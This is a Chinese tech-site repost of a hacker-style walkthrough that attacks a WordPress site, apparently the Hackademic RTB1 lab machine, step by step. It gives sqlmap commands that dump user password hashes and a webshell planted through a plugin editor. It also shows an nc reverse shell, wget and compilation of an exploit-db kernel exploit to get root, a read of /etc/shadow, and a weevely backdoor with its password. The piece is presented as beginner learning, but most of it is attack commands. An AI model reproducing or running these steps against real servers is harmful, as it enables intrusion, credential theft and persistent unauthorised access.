一区二区三区三上|欧美在线视频五区|国产午夜无码在线观看视频|亚洲国产裸体网站|无码成年人影视|亚洲AV亚洲AV|成人开心激情五月|欧美性爱内射视频|超碰人人干人人上|一区二区无码三区亚洲人区久久精品

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

黑客常用的入手思路和技術手法

Android編程精選 ? 來源:Android編程精選 ? 作者:Android編程精選 ? 2022-07-27 10:44 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

通過本文你將了解黑客常用的入手思路和技術手法,適合熱愛網(wǎng)絡信息安全的新手朋友了解學習。本文將從最開始的信息收集開始講述黑客是如何一步步的攻破你的網(wǎng)站和服務器的。閱讀本文你會學到以下內容: 1.滲透測試前的簡單信息收集。 2.sqlmap的使用 3.nmap的使用 4.nc反彈提權 5.linux系統(tǒng)的權限提升 6.backtrack 5中滲透測試工具nikto和w3af的使用等. 假設黑客要入侵的你的網(wǎng)站域名為:hack-test.com 讓我們用ping命令獲取網(wǎng)站服務器的IP地址 564710fa-0cd9-11ed-ba43-dac502259ad0.jpg ? 現(xiàn)在我們獲取了網(wǎng)站服務器的IP地址為:173.236.138.113 ? 尋找同一服務器上的其它網(wǎng)站,我們使用sameip.org. ? 5664df0e-0cd9-11ed-ba43-dac502259ad0.jpg ? 26 sites hosted on IP Address 173.236.138.113 ?

ID Domain Site Link
1 hijackthisforum.com hijackthisforum.com
2 sportforum.net sportforum.net
3 freeonlinesudoku.net freeonlinesudoku.net
4 cosplayhell.com cosplayhell.com
5 videogamenews.org videogamenews.org
6 gametour.com gametour.com
7 qualitypetsitting.net qualitypetsitting.net
8 brendanichols.com brendanichols.com
9 8ez.com 8ez.com
10 hack-test.com hack-test.com
11 kisax.com kisax.com
12 paisans.com paisans.com
13 mghz.com mghz.com
14 debateful.com debateful.com
15 jazzygoodtimes.com jazzygoodtimes.com
16 fruny.com fruny.com
17 vbum.com vbum.com
18 wuckie.com wuckie.com
19 force5inc.com force5inc.com
20 virushero.com virushero.com
21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com
22 jennieko.com jennieko.com
23 davereedy.com davereedy.com
24 joygarrido.com joygarrido.com
25 prismapp.com prismapp.com
26 utiligolf.com utiligolf.com

173.236.138.113上有26個網(wǎng)站,很多黑客為了攻破你的網(wǎng)站可能會檢查同服務器上的其它網(wǎng)站,但是本次是以研究為目標,我們將拋開服務器上的其它網(wǎng)站,只針對你的網(wǎng)站來進行入侵檢測。 我們需要關于你網(wǎng)站的以下信息: 1. DNS records (A, NS, TXT, MX and SOA) 2. Web Server Type (Apache, IIS, Tomcat) 3. Registrar (the company that owns your domain) 4. Your name, address, email and phone 5. Scripts that your site uses (php, asp, asp.net, jsp, cfm) 6. Your server OS (Unix,Linux,Windows,Solaris) 7. Your server open ports to internet (80, 443, 21, etc.) 讓我們開始找你網(wǎng)站的DNS記錄,我們用who.is來完成這一目標. 56858178-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們發(fā)現(xiàn)你的DNS記錄如下 ? 5694affe-0cd9-11ed-ba43-dac502259ad0.jpg ? ?讓我們來確定web服務器的類型 ? 56a853ec-0cd9-11ed-ba43-dac502259ad0.jpg ? 發(fā)現(xiàn)你的Web服務器是apache,接下來確定它的版本. ? ?IP:?173.236.138.113 Website Status:?active Server Type: Apache Alexa Trend/Rank:??1 Month:3,213,968 3 Month: 2,161,753 Page Views per Visit:??1 Month: 2.0 3Month: 3.7 ? 接下來是時候尋找你網(wǎng)站域名的注冊信息,你的電話、郵箱、地址等. ? 56babc26-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們現(xiàn)在已經(jīng)獲取了你的網(wǎng)站域名的注冊信息,包括你的重要信息等. ? 我們可以通過backtrack5中的whatweb來獲取你的網(wǎng)站服務器操作系統(tǒng)類型和服務器的版本. ? 56da4eec-0cd9-11ed-ba43-dac502259ad0.png56f80b3a-0cd9-11ed-ba43-dac502259ad0.png ? 我們發(fā)現(xiàn)你的網(wǎng)站使用了著名的php整站程序wordpress,服務器的的系統(tǒng)類型為FedoraLinux,Web服務器版本Apache 2.2.15.繼續(xù)查看網(wǎng)站服務器開放的端口,用滲透測試工具nmap: ? 1-Find services that run on server(查看服務器上運行的服務) ? 570b3a8e-0cd9-11ed-ba43-dac502259ad0.jpg ? 2-Find server OS(查看操作系統(tǒng)版本) ? 5729e0ce-0cd9-11ed-ba43-dac502259ad0.jpg ? 只有80端口是開放的,操作系統(tǒng)是Linux2.6.22(Fedora Core 6),現(xiàn)在我們已經(jīng)收集了所有關于你網(wǎng)站的重要信息,接下來開始掃描尋找漏洞,比如: ? Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等. ? 我們將使用Nikto來收集漏洞信息: ? root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com ? 574a97c4-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們也會用到Backtrack 5 R1中的W3AF 工具: ? root@bt:/pentest/web/w3af#./w3af_gui ? 575f3b0c-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們輸入要檢測的網(wǎng)站地址,選擇完整的安全審計選項. ? 57719b26-0cd9-11ed-ba43-dac502259ad0.jpg ? 稍等一會,你將會看到掃描結果. ? 57880e9c-0cd9-11ed-ba43-dac502259ad0.jpg ? ?發(fā)現(xiàn)你的網(wǎng)站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞. ? http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 ? 我們通過工具發(fā)現(xiàn)這個URL存在SQL注入,我們通過Sqlmap來檢測這個url. ? Using sqlmap with –u url ? 57a40dc2-0cd9-11ed-ba43-dac502259ad0.png ? 過一會你會看到 ? 57b490de-0cd9-11ed-ba43-dac502259ad0.png ? 輸入N按回車鍵繼續(xù) ? 57d2e2b4-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們發(fā)現(xiàn)你的網(wǎng)站存在mysql顯錯注入,mysql數(shù)據(jù)庫版本是5.0. 我們通過加入?yún)?shù)”-dbs”來嘗試采集數(shù)據(jù)庫名. ? 57e7e38a-0cd9-11ed-ba43-dac502259ad0.png ? 57fe3a40-0cd9-11ed-ba43-dac502259ad0.png ? 發(fā)現(xiàn)三個數(shù)據(jù)庫,接下來通過參數(shù)”-D wordpress -tables”來查看wordpress數(shù)據(jù)庫的所有表名 ? 580bb1fc-0cd9-11ed-ba43-dac502259ad0.png ? 582612ea-0cd9-11ed-ba43-dac502259ad0.jpg ? 通過參數(shù)“-T wp_users –columns ”來查看wp_users表中的字段. ? 583be868-0cd9-11ed-ba43-dac502259ad0.png ? 584ed6a8-0cd9-11ed-ba43-dac502259ad0.jpg ? 接下來猜解字段user_login和user_pass的值.用參數(shù)”-C user_login,user_pass–dump” ? 5861a9ea-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們會發(fā)現(xiàn)用戶名和密碼hashes值. 我們需要通過以下在線破解網(wǎng)站來破解密碼hashes ? http://www.onlinehashcrack.com/free-hash-reverse.php ? 5879bfa8-0cd9-11ed-ba43-dac502259ad0.png 登陸wordpress的后臺wp-admin ? 嘗試上傳php webshell到服務器,以方便運行一些linux命令.在插件頁面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點擊更新文件,然后訪問我們的phpwebshell. ? 5889a814-0cd9-11ed-ba43-dac502259ad0.jpg58a26c46-0cd9-11ed-ba43-dac502259ad0.jpg ? Phpwebshell被解析了,我們可以控制你網(wǎng)站的文件,但是我們只希望獲得網(wǎng)站服務器的root權限,來入侵服務器上其它的網(wǎng)站。 ? 我們用NC來反彈一個shell,首先在我們的電腦上監(jiān)聽5555端口. ? 58b0851a-0cd9-11ed-ba43-dac502259ad0.png ? 然后在Php webshell上反向連接我們的電腦,輸入你的IP和端口5555. ? 58c6be0c-0cd9-11ed-ba43-dac502259ad0.jpg 點擊連接我們會看到 ? 58e26238-0cd9-11ed-ba43-dac502259ad0.png ? 接下來我們嘗試執(zhí)行一些命令:

id
uid=48(apache) gid=489(apache) groups=489(apache) (用來顯示用戶的id和組)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins (顯示服務器上當前的路徑)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 72145 EST 2009 i686 i686 i386 GNU/Linux
(顯示內核版本信息) 58f7fc42-0cd9-11ed-ba43-dac502259ad0.jpg ? 現(xiàn)在我們知道,服務器的內核版本是2.6.31.5-127.fc12.1686,我們在exploit-db.com中搜索此版本的相關漏洞.
在服務器上測試了很多exp之后,我們用以下的exp來提升權限. http://www.exploit-db.com/exploits/15285 我們在nc shell上執(zhí)行以下命令: wgethttp://www.exploit-db.com/exploits/15285 -o roro.c (下載exp到服務器并重命名為roro.c)
注:很多l(xiāng)inux內核的exp都是C語言開發(fā)的,因此我們保存為.c擴展名.
exp roro.c代碼如下:

#include#include#include#include#include#include#include#include#include#include#include#define RECVPORT 5555#define SENDPORT 6666int prep_sock(int port){int s, ret;struct sockaddr_in addr;s = socket(PF_RDS, SOCK_SEQPACKET, 0);if(s < 0){printf(“[*] Could not open socket.”);exit(-1);}memset(&addr, 0, sizeof(addr));
通過以上代碼我們發(fā)現(xiàn)該exp是C語言開發(fā)的,我們需要將它編譯成elf格式的,命令如下: gcc roro.c –ororo 接下來執(zhí)行編譯好的exp ./roro 5914aed2-0cd9-11ed-ba43-dac502259ad0.jpg ? 執(zhí)行完成之后我們輸入id命令
id
我們發(fā)現(xiàn)我們已經(jīng)是root權限了
uid=0(root) gid=0(root) 592c7152-0cd9-11ed-ba43-dac502259ad0.png ? 現(xiàn)在我們可以查看/etc/shadow文件
cat/etc/shadow 5944a060-0cd9-11ed-ba43-dac502259ad0.jpg ? 我們可以使用”john theripper”工具破解所有用戶的密碼.但是我們不會這樣做,我們需要在這個服務器上留下后門以方便我們在任何時候訪問它. ? 我們用weevely制作一個php小馬上傳到服務器上. ? 1.weevely使用選項
root@bt:/pentest/backdoors/web/weevely#./main.py - 59623c38-0cd9-11ed-ba43-dac502259ad0.jpg ? 2.用weevely創(chuàng)建一個密碼為koko的php后門 ? root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko ? 596fae04-0cd9-11ed-ba43-dac502259ad0.jpg ? 接下來上傳到服務器之后來使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko 598135de-0cd9-11ed-ba43-dac502259ad0.jpg ? 測試我們的hax.php后門 ? 5993ec4c-0cd9-11ed-ba43-dac502259ad0.jpg
審核編輯:彭靜
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權轉載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務器
    +關注

    關注

    13

    文章

    9791

    瀏覽量

    87919
  • 黑客
    +關注

    關注

    3

    文章

    284

    瀏覽量

    22394
  • 網(wǎng)絡信息

    關注

    0

    文章

    28

    瀏覽量

    10424

原文標題:黑客是如何攻破一個網(wǎng)站的?

文章出處:【微信號:AndroidPush,微信公眾號:Android編程精選】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關推薦
    熱點推薦

    云原生環(huán)境里Nginx的故障排查思路

    本文聚焦于云原生環(huán)境下Nginx的故障排查思路。隨著云原生技術的廣泛應用,Nginx作為常用的高性能Web服務器和反向代理服務器,在容器化和編排的環(huán)境中面臨著新的故障場景和挑戰(zhàn)。
    的頭像 發(fā)表于 06-17 13:53 ?226次閱讀
    云原生環(huán)境里Nginx的故障排查<b class='flag-5'>思路</b>

    微孔霧化技術自動掃頻追頻-集成芯片

    微孔霧化加濕器,也稱為超聲波霧化器或者微孔加濕器,常用作補水儀或者香氛機,主要利用電子高頻(常用在105-130KHz)震蕩,通過陶瓷霧化片(換能片)的高頻諧振,將液態(tài)水分子在鋼網(wǎng)的孔隙處打散而產(chǎn)生
    發(fā)表于 05-28 11:23

    第三屆NVIDIA DPU黑客松開啟報名

    第三屆 NVIDIA DPU 中國虛擬黑客松(Hackathon)將于 6 月 28 日 - 6 月 30 日正式開啟!作為備受廣大開發(fā)者期待的年度賽事,它將提供與 NVIDIA 加速網(wǎng)絡技術深度
    的頭像 發(fā)表于 05-27 10:16 ?411次閱讀

    Linux黑客入侵檢測的排查思路

    檢查是否有UID和GID是0的賬號 UID為0代表具有root權限。
    的頭像 發(fā)表于 05-23 15:13 ?215次閱讀
    Linux<b class='flag-5'>黑客</b>入侵檢測的排查<b class='flag-5'>思路</b>

    陽臺儲能逆變產(chǎn)品維修思路

    想問一下,沒有原理圖的情況下,怎么做陽臺儲能DC-AC逆變產(chǎn)品維修工作。有大佬講一下思路嗎?
    發(fā)表于 04-25 15:30

    計算機網(wǎng)絡排錯思路總結

    明人不說暗話,這篇文章我們來聊一個非常有用,同時也是程序員必備的技能,那就是網(wǎng)絡排錯思路大總結。
    的頭像 發(fā)表于 04-01 17:32 ?369次閱讀
    計算機網(wǎng)絡排錯<b class='flag-5'>思路</b>總結

    零積分可下載四百多頁常用電機和變壓器修理技術問答

    四百多頁常用電機和變壓器修理技術問答,需要自取,零積分可下載
    發(fā)表于 03-10 17:54

    防止DeepSeek本地部署自我進化產(chǎn)生意識覺醒并利用黑客技術篡改GPS定位數(shù)據(jù)從而控制侵入飛機自動駕駛系統(tǒng)(一)

    防止DeepSeek本地部署自我進化產(chǎn)生意識覺醒并利用黑客技術篡改GPS定位數(shù)據(jù)從而控制入侵飛機自動駕駛系統(tǒng) (一) 非完整版 在這個星球上,如果說有什么能讓程序員笑得比解出千年難題還開心,那一
    發(fā)表于 02-11 22:48

    硬件設計思路與方法

    我的硬件設計思路與方法,希望能夠對大家硬件電路設計有所幫助。以下觀點或論述只代表作者的一家之言,如有不同意見,歡迎大神們留言討論。也歡迎大家評論,點贊,轉發(fā)。 硬件電路是電子產(chǎn)品實現(xiàn)功能的物理載體,電子產(chǎn)品
    的頭像 發(fā)表于 12-02 10:48 ?1588次閱讀
    硬件設計<b class='flag-5'>思路</b>與方法

    監(jiān)控平臺設計思路

    電子發(fā)燒友網(wǎng)站提供《監(jiān)控平臺設計思路.pptx》資料免費下載
    發(fā)表于 10-09 11:18 ?0次下載

    SiRider S1芯擎工業(yè)開發(fā)板測評+1.防止黑客入侵通信監(jiān)控系統(tǒng)(PSA)

    選!當然啦,如果你覺得它太厲害了有點害怕的話,那就把它想象成一個友好的機器人伙伴吧,它會一直陪伴你走過每一個技術難關的! 接下來咱們開始一起使用SiRider S1防止黑客監(jiān)控吧!這事兒聽起來挺嚴肅
    發(fā)表于 09-08 21:58

    FP8模型訓練中Debug優(yōu)化思路

    目前,市場上許多公司都積極開展基于 FP8 的大模型訓練,以提高計算效率和性能。在此,我們整理并總結了客戶及 NVIDIA 技術團隊在 FP8 模型訓練過程中的 debug 思路和方法,供大家參考。
    的頭像 發(fā)表于 09-06 14:36 ?910次閱讀
    FP8模型訓練中Debug優(yōu)化<b class='flag-5'>思路</b>

    AI4Science黑客松光子計算挑戰(zhàn)賽成功舉辦

    經(jīng)過數(shù)月角逐,第二屆AI4Science黑客松競賽日前落下帷幕。在曦智科技主持的光子計算挑戰(zhàn)賽中,參賽選手何自強和來自東北大學的參賽隊伍The Power of Light獲得完賽優(yōu)勝獎。
    的頭像 發(fā)表于 08-07 09:58 ?1011次閱讀

    科普小課堂|LCD 問題排查思路解析

    在嵌入式系統(tǒng)開發(fā)中,液晶顯示器(LCD)作為人機交互的重要界面,其穩(wěn)定性和可靠性至關重要。然而在實際應用中,LCD難免會遇到各種問題。今天和各位小伙伴分享一些常見的LCD問題及其排查思路,幫助大家快速定位并解決這些問題。
    的頭像 發(fā)表于 08-05 17:06 ?1690次閱讀
    科普小課堂|LCD 問題排查<b class='flag-5'>思路</b>解析

    stm32l431怎么驅動段碼屏?

    有沒有大佬能說一下這個屏幕是怎么驅動的?代碼應該怎么入手編寫?現(xiàn)在絲毫沒有思路,不知道從何入手,好像是長沙太陽人電子有限公司 的斷碼屏幕,但是沒有在官網(wǎng)上找到什么資料,求助[/tr]
    發(fā)表于 07-17 06:48